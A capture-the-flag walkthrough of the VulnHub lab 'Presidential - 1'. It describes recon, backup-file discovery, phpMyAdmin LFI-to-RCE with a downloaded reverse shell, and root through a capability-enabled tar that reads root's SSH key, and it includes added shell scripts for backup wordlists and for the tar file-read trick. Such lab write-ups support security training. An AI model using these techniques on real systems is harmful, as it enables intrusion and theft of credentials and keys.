Today we are going to solve another boot2root challenge called "Presidential - 1". It is available at VulnHub for penetration testing practice and you can download it from here.
The credit for making this lab goes to Thomas Williams. Let's get started and learn how to break it down.
Level: Hard
Penetration Testing Methodology
Reconnaissance
- Netdiscover
- Nmap
Enumeration
- Gobuster
- Forgotten backup files
Exploiting
- John the Ripper
- RCE via LFI in phpMyAdmin
Privilege Escalation
- Abuse of Linux capabilities
- Capture the flag
Walkthrough
Reconnaissance
We look for the machine on the network with netdiscover:
netdiscover -i ethX
Then we run nmap against all ports with OS detection, service versions, default scripts and traceroute (-A):
nmap -A -p- 192.168.10.172
Enumeration
We browse the web service, visit its different sections and find an email address that reveals the domain name.
We edit "/etc/hosts" and map the IP address to the domain we found.
We start Gobuster, configured to look for files with specific extensions (for example .bak alongside .php).
We find a file called "config.php.bak". A backup copy of a configuration file is not executed by PHP but served as plain text, and such files usually contain database credentials.
Content of "config.php.bak":
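As an added example, not part of the original walkthrough: a small POSIX shell helper that expands the filenames you already know exist on a site (config.php, index.php, ...) into the backup and editor-leftover names worth fuzzing for. Gobuster's -x flag only appends extensions to every wordlist entry, so names like config.php~ or .config.php.swp need a list like this one, which you can pass to gobuster as the wordlist or loop over with curl. The sample input at the bottom is constructed.

```shell
#!/bin/sh
# Added example (not from the original post): build a wordlist of backup and
# editor-leftover variants from filenames already found on the target.

# Print the candidate leftovers for one filename, one per line.
backup_variants() {
    name=$1
    case $name in
        *.*) base=${name%.*}; ext=${name##*.} ;;
        *)   base=$name;      ext= ;;
    esac
    # suffixes appended to the whole name: config.php.bak, config.php~ ...
    for s in .bak .old .orig .save .txt .swp '~'; do
        printf '%s%s\n' "$name" "$s"
    done
    # vim swap files are dotfiles next to the original
    printf '.%s.swp\n' "$name"
    # extension replaced instead of appended: config.bak, config.inc
    if [ -n "$ext" ] && [ -n "$base" ]; then
        printf '%s.bak\n%s.inc\n' "$base" "$base"
    fi
}

# Read known filenames on stdin and emit a de-duplicated wordlist.
expand_wordlist() {
    while IFS= read -r n; do
        [ -n "$n" ] && backup_variants "$n"
    done | sort -u
}

# Constructed example input; in practice feed the paths Gobuster already found:
#   printf 'config.php\nindex.php\n' | expand_wordlist > backups.txt
printf 'config.php\nindex.php\n' | expand_wordlist
```

The resulting list is small (ten names per known file), so it is cheap to run even against a rate-limited target, and it catches the case this box demonstrates: a .bak copy of a PHP file that the server happily returns in clear text.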
Exploiting
Back to Gobuster, this time with a "medium directory" wordlist and the "vhost" mode, which lets us enumerate sub-domains.
We get a single result:
We browse to the subdomain and find a phpMyAdmin login panel. We log in with the credentials obtained from the backup file and find the password hash of the user "admin". It is likely that this user reuses the same credential for other corporate services.
We save the hash to a file and crack it with John the Ripper and the well-known "rockyou" wordlist.
The next step is to identify the phpMyAdmin version and look for an exploit that gives us access to the machine itself.
We find an exploit that lets us run PHP code: a SQL statement writes our payload into our own PHP session file, and a local file inclusion (LFI) flaw in phpMyAdmin then includes that session file, which is identified by our session cookie.
We test it by executing a phpinfo() as a proof of concept.
Result of the PoC:
It works! Now let's make it more useful: we create a file called "m3n0shell.sh" containing a reverse shell, serve it with a Python web server, and execute a chain of three commands on the target so that it downloads the file, marks it executable and runs it.
And don't forget to have netcat listening on port 4444!
If all goes well, we get a reverse shell. We switch to the user "admin" with the cracked credentials, use Python to spawn an interactive TTY, and read the flag in "user.txt" and the file "notes.txt".
Privilege Escalation (root)
We list the file capabilities on the system and see that the tarS binary has a capability set with the "+ep" flags (permitted and effective).
That capability lets the binary read, and therefore archive, any file on the system without being root. Once the file is inside an archive we own, we only have to extract it to read its content.
With that in mind, we archive root's "id_rsa" with tarS, extract the archive, and can read the private key.
We copy the content of "id_rsa" to our machine, restrict its permissions (chmod 600, otherwise SSH refuses the key) and connect as "root" through the SSH service.
Once inside, we read the root flag.
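The capability abuse above, as an added example that is not the original post's commands: list_caps enumerates binaries with file capabilities, and read_via_tar performs the archive-then-extract round-trip. TARBIN defaults to plain tar so the round-trip runs anywhere; on the target you would set it to the capability-bearing binary (the post shows it as tarS and does not give its path). That the capability involved is cap_dac_read_search is an assumption, since the post only shows the +ep flags; the demo file at the bottom is constructed.

```shell
#!/bin/sh
# Added example (not from the original post): a tar binary with a file
# capability that bypasses read permission checks can archive root's private
# key; the unprivileged user then unpacks the archive with ordinary tar.

# Enumerate binaries carrying file capabilities. Needs getcap (libcap). The
# capability to look for is one that bypasses DAC read checks, typically
# cap_dac_read_search (assumption: the post shows only the +ep flags).
list_caps() {
    command -v getcap >/dev/null 2>&1 || { echo "getcap not installed" >&2; return 0; }
    getcap -r / 2>/dev/null || true
}

# Archive $1 with the privileged tar into $2, unpack it there with normal tar
# and print the path of the readable copy. tar strips the leading '/' from
# member names, so /root/.ssh/id_rsa ends up at $2/root/.ssh/id_rsa; as a
# non-root extractor we become its owner, so the archived 0600 mode no
# longer keeps us out.
read_via_tar() {
    src=$1
    workdir=$2
    tarbin=${TARBIN:-tar}
    mkdir -p "$workdir"
    archive="$workdir/out.tar"
    "$tarbin" -cf "$archive" "$src" 2>/dev/null
    tar -xf "$archive" -C "$workdir"
    rel=$(printf '%s' "$src" | sed 's#^/*##')
    printf '%s\n' "$workdir/$rel"
}

# Stand-alone demo on a constructed file we can read anyway. On the target:
#   TARBIN=tarS read_via_tar /root/.ssh/id_rsa /tmp/loot
# then chmod 600 the copy and: ssh -i /tmp/loot/root/.ssh/id_rsa root@<target>
demo=$(mktemp -d)
printf 'demo key material\n' > "$demo/id_rsa"
chmod 600 "$demo/id_rsa"
copy=$(read_via_tar "$demo/id_rsa" "$demo/work")
cat "$copy"
rm -rf "$demo"
```

The same trick works for /etc/shadow or any other root-only file; the capability only grants reading, which is exactly why the key, rather than a writable file, is the shortest route to a root shell here.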